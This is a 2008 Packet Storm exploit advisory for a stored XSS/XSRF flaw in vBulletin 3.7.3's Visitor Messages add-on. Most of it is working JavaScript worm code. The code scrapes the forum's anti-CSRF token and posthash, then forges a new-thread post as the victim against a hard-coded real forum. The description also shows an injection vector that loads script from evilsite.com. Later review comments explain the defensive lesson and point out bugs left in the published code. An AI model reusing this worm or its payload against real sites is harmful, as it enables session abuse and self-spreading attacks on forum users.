vbulletin-xssxsrf.txt

🗓️ 20 Nov 2008 00:00:00 — Reported by Mx
🔗 Source: packetstormsecurity.com

vBulletin 3.7.3 Visitor Messages XSS/XSRF vulnerability



Code
`/* -----------------------------  
* Author = Mx  
* Title = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm  
* Software = vBulletin  
* Addon = Visitor Messages  
* Version = 3.7.3  
* Attack = XSS/XSRF  
  
* Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included  
* with the visitor messages addon (a clone of a social network wall/comment area).  
* When posting XSS, the data is run through htmlentities() before being displayed  
* to the general public/forum members. However, when posting a new message,  
* a new notification is sent to the recipient (the "commentee"). The commenter posts an XSS vector such as  
* <script src="http://evilsite.com/nbd.js">, and when the recipient visits usercp.php  
* under the forum's own domain, they are hit with an unfiltered XSS attack. The root cause is the missing  
* output encoding on that notification path; vBulletin's per-session SECURITYTOKEN does not help, because  
* the injected script runs in the forum's origin and can simply read the token (see getAXAH below).  
* XSRF is therefore also readily available, and I have included an example worm that makes the user  
* post a new thread with your own specified subject and message.  
  
* Enjoy. Greets to Zain, Ytcracker, and http://digitalgangster.com which was the first subject  
* of the attack method.  
* ----------------------------- */  
  
/*
 * getNewHttpObject(): return a fresh XHR-capable object.
 *
 * Tries the two legacy MSXML ActiveX ProgIDs first (the only way pre-IE7
 * exposed XMLHttpRequest) and falls back to the native constructor. On any
 * browser without ActiveXObject the first two attempts throw a ReferenceError,
 * which is swallowed, and the native object is returned.
 *
 * Kept in ES3 syntax on purpose: the ActiveX branch only matters on browsers
 * that cannot parse newer syntax.
 *
 * @returns {object} an XMLHttpRequest-like object. The native fallback is not
 *   wrapped in a try, so a runtime with none of the three constructors throws
 *   instead of returning a placeholder.
 */
function getNewHttpObject() {
  var progIds = ['Msxml2.XMLHTTP', 'Microsoft.XMLHTTP'];
  for (var i = 0; i < progIds.length; i++) {
    try {
      return new ActiveXObject(progIds[i]);
    } catch (ignored) {
      // ProgID unavailable (or no ActiveX at all): try the next candidate
    }
  }
  // last resort: native XHR, deliberately outside any try
  return new XMLHttpRequest();
}
  
/*  
 * getAXAH(url): the XSRF half of the "worm".  
 *  
 * This script is loaded by the <script src=...> injected through the unescaped  
 * visitor-message notification, so it executes in the forum's own origin and  
 * the XHR below is same-origin: the browser attaches the victim's session  
 * cookies. It GETs the new-thread form at `url`, scrapes the two anti-CSRF  
 * values embedded in the page (the per-session SECURITYTOKEN JS variable and  
 * the hidden `posthash` field) out of the raw HTML, and hands them to  
 * postAXAH() to submit a thread in the victim's name.  
 *  
 * Defensive takeaway: a CSRF token is only as secret as the page that carries  
 * it. Once attacker script runs in the origin (XSS), it can read the token and  
 * the server-side check is moot; the fix is output encoding on the  
 * notification path, not a stronger token. The absolute digitalgangster.com  
 * URLs also mean this only works when the script is running on that host  
 * (cross-origin XHR would be refused).  
 *  
 * @param {string} url  new-thread form URL (caller passes do=newthread&f=5)  
 * @returns {undefined}  all work happens asynchronously in processAXAH()  
 */  
function getAXAH(url){  
  
var theHttpRequest = getNewHttpObject();  
// processAXAH is a function declaration further down; it is hoisted, so the  
// reference here is valid.  
theHttpRequest.onreadystatechange = function() {processAXAH();};  
theHttpRequest.open("GET", url);  
// a body of `false` on a GET is ignored by XHR  
theHttpRequest.send(false);  
  
// readystatechange handler: fires on every state change, acts only on DONE/200.  
function processAXAH(){  
if (theHttpRequest.readyState == 4) {  
if (theHttpRequest.status == 200) {  
  
var str = theHttpRequest.responseText;  
// 'var SECURITYTOKEN = "' is 21 chars; the token is assumed to be exactly 51  
// chars wide (not verified here). There is no -1 check: if the marker is  
// absent, secloc is -1 and sectok is garbage, but the POST is still sent.  
var secloc = str.indexOf('var SECURITYTOKEN = "');  
var sectok = str.substring(21+secloc,secloc+51+21);  
  
// 'posthash" value="' is 17 chars; the hash is assumed to be 32 chars wide.  
// Same missing -1 check as above.  
var posloc = str.indexOf('posthash" value="');  
var postok = str.substring(17+posloc,posloc+32+17);  
  
// attacker-chosen thread content. Not URL-encoded, so '&', '=', '+' or  
// non-ASCII here would corrupt the form body built below.  
var subject = 'subject text';  
var message = 'message text';  
  
// Target host and forum id (f=5) are hard-coded; the scraped token and  
// posthash are spliced into an ordinary newthread.php form submission.  
// NOTE(review): there is no '&' between the posthash value and  
// 'poststarttime=1', so as published the posthash field carries that text  
// glued onto it and poststarttime is never sent as its own field. Left  
// exactly as published.  
postAXAH('http://digitalgangster.com/4um/newthread.php?do=postthread&f=5', 'subject=' + subject + '&message=' + message + '&wysiwyg=0&taglist=&iconid=0&s=&securitytoken=' + sectok + '&f=5&do=postthread&posthash=' + postok + 'poststarttime=1&loggedinuser=1&sbutton=Submit+New+Thread&signature=1&parseurl=1&emailupdate=0&polloptions=4');  
  
}  
}  
}  
}  
  
  
  
  
  
  
  
  
/*  
 * postAXAH(url, params): submit the forged new-thread POST.  
 *  
 * Same-origin XHR again, so the victim's cookies ride along and the server  
 * sees an ordinary authenticated form submission carrying the scraped  
 * securitytoken/posthash. The response is never inspected beyond the  
 * readyState/status check.  
 *  
 * @param {string} url     newthread.php?do=postthread&f=5 on the target forum  
 * @param {string} params  pre-built application/x-www-form-urlencoded body  
 * @returns {undefined}  
 */  
function postAXAH(url, params) {  
var theHttpRequest = getNewHttpObject();  
  
// NOTE(review): `elementContainer` is not declared anywhere in this file  
// (not a parameter, not a local), so unless the hosting page happens to define  
// it globally, evaluating it throws a ReferenceError each time this handler  
// fires. That only happens after send() below, so the POST still goes out and  
// the handler body is empty anyway. Left as published.  
theHttpRequest.onreadystatechange = function() {processAXAHr(elementContainer);};  
theHttpRequest.open("POST", url);  
// form encoding so the server reads the body as ordinary POST fields; the  
// iso-8859-2 charset is as published.  
theHttpRequest.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=iso-8859-2');  
theHttpRequest.send(params);  
  
// Completion handler: checks DONE/200 and then does nothing with the response.  
function processAXAHr(elementContainer){  
if (theHttpRequest.readyState == 4) {  
if (theHttpRequest.status == 200) {  
  
}  
}  
}  
}  
  
  
// Entry point: runs as soon as the injected script loads in the victim's  
// browser. First kick off the token-scrape + forged-post chain against the  
// hard-coded forum, then document.write an <iframe> of the same new-thread  
// page. The iframe tag is never closed and its purpose is not explained in  
// the source — presumably it forces the form page to load in the victim's  
// session; verify before relying on that reading.  
getAXAH('http://digitalgangster.com/4um/newthread.php?do=newthread&f=5');  
document.write('<iframe src="http://digitalgangster.com/4um/newthread.php?do=newthread&f=5">');  
  
`
